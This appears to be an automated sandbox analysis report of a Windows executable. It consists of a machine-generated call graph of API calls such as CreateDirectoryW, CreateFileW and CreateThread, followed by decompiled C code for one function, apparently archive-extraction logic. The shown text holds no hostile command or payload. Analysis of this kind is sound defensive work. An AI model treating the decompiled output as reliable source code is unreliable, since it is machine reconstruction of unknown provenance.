37715->37705 37716->37718 37717->37708 37718->37226 37718->37234 37719->37705 37721 411c7a 37720->37721 37722 40862d ctype 13 API calls 37721->37722 37723 411cc3 37722->37723 37724 409500 12 API calls 37723->37724 37725 411ccd 37724->37725 37726 401e26 11 API calls 37725->37726 37727 411ce0 37726->37727 37727->37233 37738 419315 37728->37738 37752 416b45 37728->37752 37729 419455 37730 41948c 37729->37730 37731 415c6d 11 API calls 37729->37731 37733 4194f1 37730->37733 37734 4194ab 37730->37734 37731->37729 37736 408604 ctype 13 API calls 37733->37736 37737 408604 ctype 13 API calls 37734->37737 37739 4194f6 37736->37739 37740 4194b0 37737->37740 37738->37729 37746 401e26 11 API calls 37738->37746 37750 40c20f VariantClear 37738->37750 37751 407a18 11 API calls ctype 37738->37751 37738->37752 37852 40c13b VariantClear 37738->37852 37853 419556 SysAllocString VariantClear 37738->37853 37854 406796 12 API calls 37738->37854 37855 40c068 VariantClear VariantCopy 37738->37855 37744 40862d ctype 13 API calls 37739->37744 37743 40862d ctype 13 API calls 37740->37743 37745 4194c3 37743->37745 37747 41951e 37744->37747 37748 408604 ctype 13 API calls 37745->37748 37746->37738 37749 408604 ctype 13 API calls 37747->37749 37748->37752 37749->37752 37750->37738 37751->37738 37752->37238 37752->37239 37761 4290f3 37753->37761 37754 429274 37756 40862d ctype 13 API calls 37754->37756 37758 429287 37756->37758 37757 4299f0 15 API calls 37757->37761 37760 408604 ctype 13 API calls 37758->37760 37759 408604 13 API calls ctype 37759->37761 37778 429122 37760->37778 37761->37757 37761->37759 37773 42925f 37761->37773 37761->37778 37977 4298b3 12 API calls 37761->37977 37762 42932b 37764 429925 14 API calls 37762->37764 37763 429360 37856 429925 __EH_prolog 37763->37856 37764->37754 37767 42937b 37978 4299b8 14 API calls ctype 37767->37978 37770 429429 37771 429925 14 API calls 37770->37771 37772 42945a 37771->37772 37774 40862d ctype 13 API calls 37772->37774 37773->37754 37773->37762 37773->37763 37773->37770 37779 42a381 85 API calls 37773->37779 37780 429660 37773->37780 37781 42956b 37773->37781 37782 4295ed 37773->37782 37788 4296d5 37773->37788 37863 42a06f 37773->37863 37867 4264f7 __EH_prolog 37773->37867 37979 429f42 __EH_prolog 37773->37979 37776 42946d 37774->37776 37777 408604 ctype 13 API calls 37776->37777 37777->37778 37778->37245 37779->37773 37783 429925 14 API calls 37780->37783 37785 429925 14 API calls 37781->37785 37786 429925 14 API calls 37782->37786 37784 4295a6 37783->37784 37787 40862d ctype 13 API calls 37784->37787 37785->37784 37786->37784 37789 4295b9 37787->37789 37790 429925 14 API calls 37788->37790 37792 408604 ctype 13 API calls 37789->37792 37791 429713 37790->37791 37980 4299b8 14 API calls ctype 37791->37980 37792->37778 37811 429306 37794->37811 37795 42932b 37797 429925 14 API calls 37795->37797 37796 429360 37799 429925 14 API calls 37796->37799 37798 42927f 37797->37798 37801 40862d ctype 13 API calls 37798->37801 37802 42937b 37799->37802 37803 429287 37801->37803 38460 4299b8 14 API calls ctype 37802->38460 37805 408604 ctype 13 API calls 37803->37805 37808 429293 37805->37808 37806 42a06f 85 API calls 37806->37811 37807 429429 37809 429925 14 API calls 37807->37809 37808->37245 37810 42945a 37809->37810 37812 40862d ctype 13 API calls 37810->37812 37811->37795 37811->37796 37811->37806 37811->37807 37813 4264f7 125 API calls 37811->37813 37816 42a381 85 API calls 37811->37816 37817 4295ed 37811->37817 37818 429660 37811->37818 37819 42956b 37811->37819 37825 4296d5 37811->37825 38461 429f42 __EH_prolog 37811->38461 37814 42946d 37812->37814 37813->37811 37815 408604 ctype 13 API calls 37814->37815 37815->37808 37816->37811 37823 429925 14 API calls 37817->37823 37820 429925 14 API calls 37818->37820 37822 429925 14 API calls 37819->37822 37821 4295a6 37820->37821 37824 40862d ctype 13 API calls 37821->37824 37822->37821 37823->37821 37826 4295b9 37824->37826 37827 429925 14 API calls 37825->37827 37829 408604 ctype 13 API calls 37826->37829 37828 429713 37827->37828 38462 4299b8 14 API calls ctype 37828->38462 37829->37808 37831->37227 37833 409d07 CreateDirectoryW 37832->37833 37834 409ce7 37832->37834 37835 409d15 37833->37835 37836 409d19 GetLastError 37833->37836 37850 409ad5 15 API calls ctype 37834->37850 37835->37705 37836->37835 37838 409d26 37836->37838 37840 401e9a 11 API calls 37838->37840 37839 409cf1 37851 409cbc CreateDirectoryA 37839->37851 37842 409d39 37840->37842 37846 409d62 37842->37846 37847 409d4a CreateDirectoryW 37842->37847 37843 409cf8 37844 407a18 ctype 11 API calls 37843->37844 37845 409d02 37844->37845 37845->37835 37849 407a18 ctype 11 API calls 37846->37849 37848 407a18 ctype 11 API calls 37847->37848 37848->37845 37849->37835 37850->37839 37851->37843 37852->37738 37853->37738 37854->37738 37855->37738 37857 40862d ctype 13 API calls 37856->37857 37858 429953 37857->37858 37859 408604 ctype 13 API calls 37858->37859 37860 42995e 37859->37860 37861 408604 ctype 13 API calls 37860->37861 37862 429984 37861->37862 37862->37767 37864 42a098 37863->37864 37981 42a237 37864->37981 38315 42cd7d __EH_prolog 37867->38315 37869 426646 37870 40862d ctype 13 API calls 37869->37870 37954 426843 37869->37954 37874 4266a6 37870->37874 37871 426519 37871->37869 37938 426bfc 37871->37938 38362 424385 12 API calls 37871->38362 37872 426712 37875 408604 ctype 13 API calls 37872->37875 37874->37872 37915 42675a 37874->37915 37878 426721 37875->37878 37877 426ce1 37879 427051 37877->37879 37880 426ff5 37877->37880 37884 426730 DeleteCriticalSection 37878->37884 37886 40867e 11 API calls 37879->37886 37882 408604 ctype 13 API calls 37880->37882 37881 426abe 37891 408604 ctype 13 API calls 37881->37891 37885 427004 37882->37885 37883 426ceb 37887 408604 ctype 13 API calls 37883->37887 37898 426745 37884->37898 37892 427013 DeleteCriticalSection 37885->37892 37889 42707a 37886->37889 37893 426d08 37887->37893 37888 426b96 37896 408604 ctype 13 API calls 37888->37896 37895 42709a 37889->37895 37901 415c6d 11 API calls 37889->37901 37890 426b29 37907 408604 ctype 13 API calls 37890->37907 37897 426aef 37891->37897 37892->37898 37905 426d17 DeleteCriticalSection 37893->37905 37894 426d2c 37900 408604 ctype 13 API calls 37894->37900 38335 423a69 37895->38335 38346 467ad0 37895->38346 38352 44fb10 37895->38352 38357 44f020 37895->38357 37903 426bb6 37896->37903 37910 426afe DeleteCriticalSection 37897->37910 37899 40862d ctype 13 API calls 37898->37899 37904 42703e 37899->37904 37908 426d5f 37900->37908 37901->37889 37902 426e07 37916 408604 ctype 13 API calls 37902->37916 37914 426bc5 DeleteCriticalSection 37903->37914 37906 408604 ctype 13 API calls 37904->37906 37905->37894 37906->37938 37911 426b5a 37907->37911 37918 426d6e DeleteCriticalSection 37908->37918 37909 4270bd 37913 408604 ctype 13 API calls 37909->37913 37942 426b13 37910->37942 37922 426b69 DeleteCriticalSection 37911->37922 37912 426d99 37923 408604 ctype 13 API calls 37912->37923 37931 4270ce 37913->37931 37920 426bda 37914->37920 37915->37881 37915->37888 37915->37890 37915->37954 38332 40c914 __EH_prolog 37915->38332 37917 426e24 37916->37917 37924 426e33 DeleteCriticalSection 37917->37924 37918->37942 37919 426e60 SysFreeString 37921 426e74 37919->37921 37928 40862d ctype 13 API calls 37920->37928 37925 408604 ctype 13 API calls 37921->37925 37922->37942 37927 426db9 37923->37927 37924->37942 37930 426e89 37925->37930 37926 40867e 11 API calls 37926->37954 37936 426dc8 DeleteCriticalSection 37927->37936 37933 426bf0 37928->37933 37929 40862d ctype 13 API calls 37934 426f36 37929->37934 37939 426e98 DeleteCriticalSection 37930->37939 38363 42434d 14 API calls ctype 37931->38363 37932 40fa26 11 API calls 37932->37954 37937 408604 ctype 13 API calls 37933->37937 37935 408604 ctype 13 API calls 37934->37935 37935->37938 37941 426ddd 37936->37941 37937->37938 37938->37773 37939->37942 37943 40862d ctype 13 API calls 37941->37943 37942->37929 37944 426df3 37943->37944 37947 408604 ctype 13 API calls 37944->37947 37945 426ebd 37946 407a18 ctype 11 API calls 37945->37946 37949 426ec2 37946->37949 37947->37938 37948 407a18 ctype 11 API calls 37948->37954 37950 407a18 ctype 11 API calls 37949->37950 37953 426ed1 SysFreeString 37950->37953 37951 407a18 ctype 11 API calls 37952 426a0c SysFreeString 37951->37952 37952->37954 37956 426ee7 37953->37956 37954->37877 37954->37883 37954->37894 37954->37902 37954->37912 37954->37919 37954->37926 37954->37932 37954->37945 37954->37948 37954->37951 37955 415c6d 11 API calls 37954->37955 37957 408604 13 API calls ctype 37954->37957 37958 426f47 37954->37958 37955->37954 37959 408604 ctype 13 API calls 37956->37959 37957->37954 37960 408604 ctype 13 API calls 37958->37960 37961 426efc 37959->37961 37962 426f56 37960->37962 37964 426f0b DeleteCriticalSection 37961->37964 37963 408604 ctype 13 API calls 37962->37963 37965 426f65 37963->37965 37964->37942 37966 408604 ctype 13 API calls 37965->37966 37967 426f74 37966->37967 37968 426f83 DeleteCriticalSection 37967->37968 37969 426f98 37968->37969 37970 40862d ctype 13 API calls 37969->37970 37971 426fae 37970->37971 37972 408604 ctype 13 API calls 37971->37972 37972->37938 37977->37761 37978->37778 37979->37773 37980->37778 37984 42a23a 37981->37984 37982 42a0b3 37982->37773 37984->37982 37986 42a0b8 __EH_prolog 37984->37986 37991 42a1fa 40 API calls 37984->37991 37987 42a0da 37986->37987 37992 412027 __EH_prolog 37987->37992 38266 40bd37 37987->38266 37988 42a10f 37988->37984 37991->37984 37993 412055 37992->37993 37994 401e9a 11 API calls 37993->37994 37996 4120aa 37994->37996 37995 407a18 ctype 11 API calls 37997 412907 37995->37997 37998 401e26 11 API calls 37996->37998 38015 4120c3 37996->38015 37997->37988 37999 4120eb 37998->37999 38000 412121 37999->38000 38001 41210d 37999->38001 38003 41213f 38000->38003 38005 41212e 38000->38005 38002 40c20f VariantClear 38001->38002 38008 412119 38002->38008 38004 40c20f VariantClear 38003->38004 38009 41215b 38004->38009 38006 40c20f VariantClear 38005->38006 38006->38008 38007 407a18 ctype 11 API calls 38007->37997 38008->38007 38009->38015 38269 411fa9 __EH_prolog 38009->38269 38013 41219c 38013->38015 38016 412211 38013->38016 38017 412222 38013->38017 38021 4124ec 38013->38021 38014 407a18 ctype 11 API calls 38014->37997 38015->37995 38019 40c20f VariantClear 38016->38019 38018 412229 38017->38018 38020 412bb1 38017->38020 38023 40c20f VariantClear 38018->38023 38022 41221d 38019->38022 38024 40c20f VariantClear 38020->38024 38021->38014 38026 407a18 ctype 11 API calls 38022->38026 38025 41224e 38023->38025 38024->38022 38273 411f1a __EH_prolog 38025->38273 38026->37997 38029 411f1a 2 API calls 38030 41227d 38029->38030 38030->38015 38031 411f1a 2 API calls 38030->38031 38032 412297 38031->38032 38032->38015 38277 408833 __EH_prolog 38032->38277 38034 40862d ctype 13 API calls 38035 4125d1 38034->38035 38036 408604 ctype 13 API calls 38035->38036 38036->38015 38037 4122dd 38038 412428 38037->38038 38039 401e9a 11 API calls 38037->38039 38177 4122e4 38037->38177 38040 412444 38038->38040 38045 41247c 38038->38045 38041 4123b7 38039->38041 38042 401e26 11 API calls 38040->38042 38289 411ed0 20 API calls 38041->38289 38044 412452 38042->38044 38046 41245e 38044->38046 38291 409b24 19 API calls ctype 38044->38291 38051 40b431 20 API calls 38045->38051 38061 412924 38045->38061 38049 407a18 ctype 11 API calls 38046->38049 38047 401e26 11 API calls 38048 412b82 38047->38048 38053 407a18 ctype 11 API calls 38048->38053 38054 412466 38049->38054 38050 41241c 38055 407a18 ctype 11 API calls 38050->38055 38056 41249f 38051->38056 38057 412b8a 38053->38057 38058 407a18 ctype 11 API calls 38054->38058 38055->38038 38059 412918 38056->38059 38062 4124f1 38056->38062 38063 4124ae 38056->38063 38060 407a18 ctype 11 API calls 38057->38060 38146 41246e 38058->38146 38064 407a18 ctype 11 API calls 38059->38064 38065 412b92 38060->38065 38093 412b5c 38061->38093 38110 412ab4 38061->38110 38111 412a7e 38061->38111 38178 412ad8 38061->38178 38077 412538 38062->38077 38091 412579 38062->38091 38066 4124b6 38063->38066 38092 412628 38063->38092 38064->38061 38068 40862d ctype 13 API calls 38065->38068 38072 407a18 ctype 11 API calls 38066->38072 38067 40862d ctype 13 API calls 38074 41268e 38067->38074 38075 412ba3 38068->38075 38069 412761 38076 412952 38069->38076 38089 41276a 38069->38089 38070 4126b7 38292 40cd50 12 API calls ctype 38070->38292 38071 4123ca 38071->38050 38073 412406 38071->38073 38079 4124be 38072->38079 38290 4098cf 17 API calls ctype 38073->38290 38082 408604 ctype 13 API calls 38074->38082 38083 408604 ctype 13 API calls 38075->38083 38295 409f99 23 API calls ctype 38076->38295 38084 407a18 ctype 11 API calls 38077->38084 38080 407a18 ctype 11 API calls 38079->38080 38086 4124c6 38080->38086 38082->38015 38083->38021 38090 412540 38084->38090 38085 4126bf 38085->38059 38109 4126c7 38085->38109 38094 407a18 ctype 11 API calls 38086->38094 38088 41295a 38088->38059 38116 41295e 38088->38116 38293 40cd50 12 API calls ctype 38089->38293 38096 407a18 ctype 11 API calls 38090->38096 38091->38092 38097 412660 38091->38097 38098 412592 38091->38098 38092->38069 38092->38070 38093->38047 38099 4124ce 38094->38099 38102 412548 38096->38102 38105 407a18 ctype 11 API calls 38097->38105 38103 412631 38098->38103 38104 412599 38098->38104 38106 40862d ctype 13 API calls 38099->38106 38100 412b0a 38118 407a18 ctype 11 API calls 38100->38118 38101 412782 38107 41281d 38101->38107 38150 41278a 38101->38150 38108 407a18 ctype 11 API calls 38102->38108 38112 407a18 ctype 11 API calls 38103->38112 38104->38092 38113 4125a0 38104->38113 38114 412668 38105->38114 38115 4124e0 38106->38115 38294 409bc3 19 API calls ctype 38107->38294 38119 412550 38108->38119 38131 407a18 ctype 11 API calls 38109->38131 38124 407a18 ctype 11 API calls 38110->38124 38120 407a18 ctype 11 API calls 38111->38120 38121 412640 38112->38121 38122 4125e7 38113->38122 38123 4125a6 38113->38123 38125 407a18 ctype 11 API calls 38114->38125 38126 408604 ctype 13 API calls 38115->38126 38139 407a18 ctype 11 API calls 38116->38139 38129 412b20 38118->38129 38130 40862d ctype 13 API calls 38119->38130 38132 412a83 38120->38132 38133 407a18 ctype 11 API calls 38121->38133 38127 407a18 ctype 11 API calls 38122->38127 38134 407a18 ctype 11 API calls 38123->38134 38135 412ab9 38124->38135 38136 412670 38125->38136 38126->38021 38138 4125ec 38127->38138 38128 412828 38140 41290f 38128->38140 38168 412830 38128->38168 38141 407a18 ctype 11 API calls 38129->38141 38142 412566 38130->38142 38143 4126f3 38131->38143 38154 407a18 ctype 11 API calls 38132->38154 38144 412648 38133->38144 38145 4125ab 38134->38145 38147 407a18 ctype 11 API calls 38135->38147 38137 407a18 ctype 11 API calls 38136->38137 38137->38146 38148 407a18 ctype 11 API calls 38138->38148 38149 41298a 38139->38149 38153 407a18 ctype 11 API calls 38140->38153 38151 412b28 38141->38151 38152 408604 ctype 13 API calls 38142->38152 38171 412735 38143->38171 38172 412709 38143->38172 38155 407a18 ctype 11 API calls 38144->38155 38156 407a18 ctype 11 API calls 38145->38156 38146->38067 38158 412ad0 38147->38158 38159 4125f4 38148->38159 38180 4129a0 38149->38180 38181 4129e2 38149->38181 38160 4127b5 38150->38160 38161 4127e9 38150->38161 38162 40862d ctype 13 API calls 38151->38162 38152->38015 38163 412917 38153->38163 38164 412a9a 38154->38164 38155->38146 38157 4125b3 38156->38157 38165 407a18 ctype 11 API calls 38157->38165 38166 407a18 ctype 11 API calls 38158->38166 38167 407a18 ctype 11 API calls 38159->38167 38169 407a18 ctype 11 API calls 38160->38169 38174 407a18 ctype 11 API calls 38161->38174 38170 412b3d 38162->38170 38163->38059 38173 407a18 ctype 11 API calls 38164->38173 38165->38177 38166->38178 38179 4125fc 38167->38179 38190 407a18 ctype 11 API calls 38168->38190 38182 4127ba 38169->38182 38183 408604 ctype 13 API calls 38170->38183 38175 407a18 ctype 11 API calls 38171->38175 38184 407a18 ctype 11 API calls 38172->38184 38185 4129c7 38173->38185 38176 4127ee 38174->38176 38186 41273a 38175->38186 38187 407a18 ctype 11 API calls 38176->38187 38177->38034 38178->38093 38178->38100 38188 40862d ctype 13 API calls 38179->38188 38189 407a18 ctype 11 API calls 38180->38189 38193 407a18 ctype 11 API calls 38181->38193 38191 407a18 ctype 11 API calls 38182->38191 38183->38015 38192 41270e 38184->38192 38201 40862d ctype 13 API calls 38185->38201 38194 407a18 ctype 11 API calls 38186->38194 38195 4127f6 38187->38195 38196 412612 38188->38196 38197 4129a5 38189->38197 38198 41285c 38190->38198 38199 4127c2 38191->38199 38200 407a18 ctype 11 API calls 38192->38200 38202 4129e7 38193->38202 38204 412742 38194->38204 38205 407a18 ctype 11 API calls 38195->38205 38206 408604 ctype 13 API calls 38196->38206 38207 407a18 ctype 11 API calls 38197->38207 38222 412872 38198->38222 38223 4128b7 38198->38223 38208 407a18 ctype 11 API calls 38199->38208 38209 412716 38200->38209 38210 4129cf 38201->38210 38203 407a18 ctype 11 API calls 38202->38203 38211 4129ef 38203->38211 38212 407a18 ctype 11 API calls 38204->38212 38213 4127fe 38205->38213 38206->38015 38214 4129ad 38207->38214 38215 4127ca 38208->38215 38216 407a18 ctype 11 API calls 38209->38216 38217 408604 ctype 13 API calls 38210->38217 38218 407a18 ctype 11 API calls 38211->38218 38219 41274a 38212->38219 38220 407a18 ctype 11 API calls 38213->38220 38221 407a18 ctype 11 API calls 38214->38221 38224 407a18 ctype 11 API calls 38215->38224 38225 41271e 38216->38225 38217->38015 38226 4129f7 38218->38226 38227 407a18 ctype 11 API calls 38219->38227 38228 412806 38220->38228 38230 4129b5 38221->38230 38231 407a18 ctype 11 API calls 38222->38231 38229 407a18 ctype 11 API calls 38223->38229 38232 4127d2 38224->38232 38233 407a18 ctype 11 API calls 38225->38233 38234 407a18 ctype 11 API calls 38226->38234 38235 412752 38227->38235 38236 407a18 ctype 11 API calls 38228->38236 38237 4128bc 38229->38237 38238 407a18 ctype 11 API calls 38230->38238 38239 412877 38231->38239 38240 407a18 ctype 11 API calls 38232->38240 38241 412726 38233->38241 38242 4129ff 38234->38242 38248 40862d ctype 13 API calls 38235->38248 38236->38235 38243 407a18 ctype 11 API calls 38237->38243 38244 4129bd 38238->38244 38245 407a18 ctype 11 API calls 38239->38245 38240->38241 38246 40862d ctype 13 API calls 38241->38246 38242->38061 38247 4128c4 38243->38247 38244->38185 38249 41287f 38245->38249 38250 4128a9 38246->38250 38251 407a18 ctype 11 API calls 38247->38251 38252 4128ee 38248->38252 38253 407a18 ctype 11 API calls 38249->38253 38254 408604 ctype 13 API calls 38250->38254 38255 4128cc 38251->38255 38256 408604 ctype 13 API calls 38252->38256 38257 412887 38253->38257 38254->38008 38258 407a18 ctype 11 API calls 38255->38258 38256->38008 38259 407a18 ctype 11 API calls 38257->38259 38260 4128d4 38258->38260 38261 41288f 38259->38261 38262 407a18 ctype 11 API calls 38260->38262 38263 407a18 ctype 11 API calls 38261->38263 38264 4128dc 38262->38264 38265 412897 38263->38265 38264->38235 38265->38241 38296 40b8bf __EH_prolog 38266->38296 38270 411fde 38269->38270 38271 40c20f VariantClear 38270->38271 38272 412017 38271->38272 38272->38013 38272->38015 38288 408e6d 18 API calls 38272->38288 38274 411f50 38273->38274 38275 40c20f VariantClear 38274->38275 38276 411f97 38275->38276 38276->38015 38276->38029 38278 40862d ctype 13 API calls 38277->38278 38279 40884f 38278->38279 38280 401e9a 11 API calls 38279->38280 38287 408864 38280->38287 38281 4088bc 38282 407a18 ctype 11 API calls 38281->38282 38285 4088c4 38282->38285 38283 4088b0 38284 406796 12 API calls 38283->38284 38284->38281 38285->38037 38286 406796 12 API calls 38286->38287 38287->38281 38287->38283 38287->38286 38288->38013 38289->38071 38290->38050 38291->38046 38292->38085 38293->38101 38294->38128 38295->38088 38297 40b931 38296->38297 38298 40b8da 38296->38298 38299 40b9c0 FindCloseChangeNotification 38297->38299 38301 40b8e5 AreFileApisANSI 38298->38301 38300 40b938 38299->38300 38302 40b93c CreateFileW 38300->38302 38314 40b92b 38300->38314 38303 40822f 13 API calls 38301->38303 38304 40b95d 38302->38304 38302->38314 38305 40b8ff 38303->38305 38306 401e9a 11 API calls 38304->38306 38308 407a18 ctype 11 API calls 38305->38308 38307 40b970 38306->38307 38310 40b986 CreateFileW 38307->38310 38311 40b99b 38307->38311 38309 40b923 38308->38309 38312 407a18 ctype 11 API calls 38309->38312 38310->38311 38313 407a18 ctype 11 API calls 38311->38313 38312->38314 38313->38314 38314->37988 38316 42cd9e 38315->38316 38331 42cf33 38315->38331 38316->38331 38364 42cfaa 13 API calls ctype 38316->38364 38319 42cdcf 38320 42cf8d 38319->38320 38365 42cfaa 13 API calls ctype 38319->38365 38322 408604 ctype 13 API calls 38320->38322 38321 42ce44 38323 408604 ctype 13 API calls 38321->38323 38322->38331 38328 42ce50 38323->38328 38324 42ce20 38324->38320 38324->38321 38325 42cee6 38326 408604 ctype 13 API calls 38325->38326 38329 42cf27 38326->38329 38327 415c6d 11 API calls 38327->38328 38328->38325 38328->38327 38330 408604 ctype 13 API calls 38329->38330 38330->38331 38331->37871 38366 40c83c __EH_prolog 38332->38366 38334 40c940 38334->37915 38336 40862d ctype 13 API calls 38335->38336 38337 423a7b 38336->38337 38338 40862d ctype 13 API calls 38337->38338 38339 423a86 38338->38339 38340 423ab9 38339->38340 38342 415c6d 11 API calls 38339->38342 38341 423af0 38340->38341 38343 415c6d 11 API calls 38340->38343 38344 423b1b 38341->38344 38373 40d997 38341->38373 38342->38339 38343->38340 38344->37909 38395 46cd08 38346->38395 38349 467af3 38349->37909 38350 467af8 GetLastError 38351 467b02 38350->38351 38351->37909 38354 44fb24 38352->38354 38355 44fd6d 38352->38355 38353 40fb0c 87 API calls 38353->38354 38354->38353 38354->38355 38448 40e410 38354->38448 38355->37909 38358 44f041 38357->38358 38360 44f032 38357->38360 38359 40fb0c 87 API calls 38358->38359 38358->38360 38361 40e410 8 API calls 38358->38361 38359->38358 38360->37909 38361->38358 38362->37871 38363->37938 38364->38319 38365->38324 38368 40c85e 38366->38368 38367 40c8e4 38367->38334 38368->38367 38370 40d550 __EH_prolog 38368->38370 38371 4585c0 VirtualAlloc 38370->38371 38372 40d623 38371->38372 38372->38367 38375 40d9a1 38373->38375 38377 40fb0c 38375->38377 38379 40fb19 38377->38379 38378 40d9d0 38378->38344 38379->38378 38382 42a1c1 38379->38382 38388 42a276 38379->38388 38383 42a1cc 38382->38383 38385 40b9c0 FindCloseChangeNotification 38383->38385 38386 40bd82 SetFileTime 38383->38386 38387 412db2 40 API calls 38383->38387 38384 42a1e0 38384->38379 38385->38384 38386->38384 38387->38384 38392 42a282 38388->38392 38389 42a32f 38389->38379 38390 42a237 85 API calls 38390->38392 38391 42a0b8 67 API calls 38391->38392 38392->38389 38392->38390 38392->38391 38393 42a1fa 40 API calls 38392->38393 38394 4260f0 WriteFile GetLastError 38392->38394 38393->38392 38394->38392 38396 46cd18 38395->38396 38397 46cd5b 38396->38397 38399 46cd26 CreateThread 38396->38399 38398 46c0ff ctype 11 API calls 38397->38398 38400 46cd61 38398->38400 38401 46cd53 GetLastError 38399->38401 38402 467ae9 38399->38402 38405 46cd73 TlsGetValue 38399->38405 38400->38402 38404 4705d3 12 API calls 38400->38404 38401->38397 38402->38349 38402->38350 38404->38402 38406 46cdc0 TlsSetValue 38405->38406 38407 46cdab 38405->38407 38410 46cdd7 38406->38410 38411 46cddf GetCurrentThreadId 38406->38411 38425 46e3ea 38407->38425 38447 46d03c 7 API calls ctype 38410->38447 38413 46cdf0 38411->38413 38417 46ce39 38413->38417 38414 46cdde 38414->38411 38418 46ce42 38417->38418 38419 46e383 12 API calls 38418->38419 38420 46ce4a 38419->38420 38421 46d03c ctype 7 API calls 38420->38421 38423 46ce57 38420->38423 38421->38423 38422 46e3ea 13 API calls 38424 46ce5e ExitThread 38422->38424 38423->38422 38426 46e3f8 38425->38426 38427 46e489 38425->38427 38428 46e401 TlsGetValue 38426->38428 38429 46e40e 38426->38429 38427->38406 38428->38429 38430 46e47a TlsSetValue 38428->38430 38431 46e41b 38429->38431 38432 46c0ff ctype 11 API calls 38429->38432 38430->38427 38433 46e429 38431->38433 38435 46c0ff ctype 11 API calls 38431->38435 38432->38431 38434 46e437 38433->38434 38436 46c0ff ctype 11 API calls 38433->38436 38437 46e445 38434->38437 38438 46c0ff ctype 11 API calls 38434->38438 38435->38433 38436->38434 38439 46e453 38437->38439 38440 46c0ff ctype 11 API calls 38437->38440 38438->38437 38441 46e461 38439->38441 38443 46c0ff ctype 11 API calls 38439->38443 38440->38439 38442 46e472 38441->38442 38444 46c0ff ctype 11 API calls 38441->38444 38445 46c0ff ctype 11 API calls 38442->38445 38443->38441 38444->38442 38446 46e479 38445->38446 38446->38430 38447->38414 38449 40e434 38448->38449 38450 40e453 38449->38450 38452 40e738 38449->38452 38450->38354 38455 40e6d6 __EH_prolog EnterCriticalSection 38452->38455 38454 40e75c 38454->38450 38458 40d340 SetFilePointer GetLastError GetLastError 38455->38458 38456 40e708 38457 40e71d LeaveCriticalSection 38456->38457 38459 40d071 SetFilePointer GetLastError ReadFile GetLastError VirtualAlloc 38456->38459 38457->38454 38458->38456 38459->38457 38460->37808 38461->37811 38462->37808 38463 46e6aa SetUnhandledExceptionFilter 38464 40534d 38465 40535a 38464->38465 38466 40536b 38464->38466 38465->38466 38470 405372 __EH_prolog 38465->38470 38469 407a18 ctype 11 API calls 38469->38466 38471 40862d ctype 13 API calls 38470->38471 38472 405395 38471->38472 38473 408604 ctype 13 API calls 38472->38473 38474 405365 38473->38474 38474->38469 38475 41c10c __EH_prolog 38476 41c143 38475->38476 38477 41c139 38475->38477 38476->38477 38491 4152b6 12 API calls 38476->38491 38479 41c19d 38480 407a18 ctype 11 API calls 38479->38480 38481 41c1bd 38480->38481 38481->38477 38492 41528b 12 API calls 38481->38492 38483 41c251 38493 40cf50 38483->38493 38486 41c267 GetLastError 38489 41c282 38486->38489 38487 41c29f 38488 407a18 ctype 11 API calls 38487->38488 38488->38477 38490 407a18 ctype 11 API calls 38489->38490 38490->38477 38491->38479 38492->38483 38496 40bc29 38493->38496 38499 40bbf0 38496->38499 38498 40bc47 38498->38486 38498->38487 38500 40b8bf 18 API calls 38499->38500 38501 40bc0d 38500->38501 38501->38498

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00403A70 Relevance: 46.7, APIs: 3, Strings: 23, Instructions: 1177COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E00403A70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t502;
				signed int _t503;
				signed char _t504;
				signed int _t507;
				signed int _t508;
				char _t517;
				signed int _t518;
				signed int _t534;
				signed int _t549;
				signed int _t554;
				signed int _t569;
				void* _t571;
				void* _t574;
				void* _t577;
				signed int _t583;
				signed int _t614;
				signed int _t625;
				signed int _t626;
				signed int _t642;
				signed int _t647;
				signed int _t648;
				intOrPtr* _t676;
				void* _t689;
				signed int _t706;
				intOrPtr* _t720;
				signed int _t725;
				void* _t729;
				signed int _t730;
				signed int _t739;
				signed int _t757;
				signed int _t764;
				signed int _t769;
				signed int _t784;
				unsigned char _t786;
				signed char _t787;
				signed int _t788;
				signed char _t792;
				signed int _t793;
				signed int _t794;
				signed int _t809;
				signed int _t812;
				signed int _t815;
				intOrPtr _t829;
				intOrPtr _t861;
				signed int _t918;
				intOrPtr _t996;
				signed int _t1065;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				signed int _t1070;
				signed int _t1073;
				char* _t1077;
				void* _t1079;
				void* _t1081;
				void* _t1082;

				L0046B890(0x473088, _t1079);
				_t1082 = _t1081 - 0x36c;
				_push(__ebx);
				SetFileApisToOEM();
				E00405B9F(_t1079 - 0x4c);
				 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
				_t1073 = 0;
				 *(_t1079 - 4) = 0;
				L00403532(_t1079 - 0x2c, GetCommandLineW());
				_t1049 = _t1079 - 0x4c;
				 *(_t1079 - 4) = 1;
				L00406C53(_t1079 - 0x2c, _t1079 - 0x4c);
				 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
				E00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
				if( *((intOrPtr*)(_t1079 - 0x44)) != 1) {
					L004036D9(__ebx, _t1079 - 0x4c, 0, 0, 1);
					E00404C12(_t1079 - 0x2d8);
					 *(_t1079 - 4) = 3;
					E0040FEC3(_t1079 - 0x7c);
					_push(_t1079 - 0x2d8);
					_push(_t1079 - 0x4c);
					 *(_t1079 - 4) = 4;
					L0040FED1(_t1079 - 0x7c, __eflags);
					__eflags =  *((char*)(_t1079 - 0x2d8));
					if( *((char*)(_t1079 - 0x2d8)) == 0) {
						__eflags =  *((char*)(_t1079 - 0x2d7));
						if( *((char*)(_t1079 - 0x2d7)) != 0) {
							E00458600();
							L0040BF39(1);
						}
						__eflags =  *((char*)(_t1079 - 0x2d2));
						_t829 = 0x490ab0;
						if( *((char*)(_t1079 - 0x2d2)) == 0) {
							_t829 = 0x490ab8;
						}
						__eflags =  *((char*)(_t1079 - 0x2d1));
						 *0x490a80 = _t829;
						if( *((char*)(_t1079 - 0x2d1)) != 0) {
							_t1049 = 0;
							__eflags = 0;
							E004051E3(_t829, 0);
						}
						_push(_t1079 - 0x2d8); // executed
						E0041035D(_t1079 - 0x7c); // executed
						_push(0x1c);
						_t502 = L004079F2();
						 *(_t1079 - 0x14) = _t502;
						__eflags = _t502 - _t1073;
						 *(_t1079 - 4) = 6;
						if(_t502 == _t1073) {
							_t1065 = 0;
							__eflags = 0;
						} else {
							_t1065 = E00405328(_t502);
						}
						__eflags = _t1065 - _t1073;
						 *(_t1079 - 0x20) = _t1065;
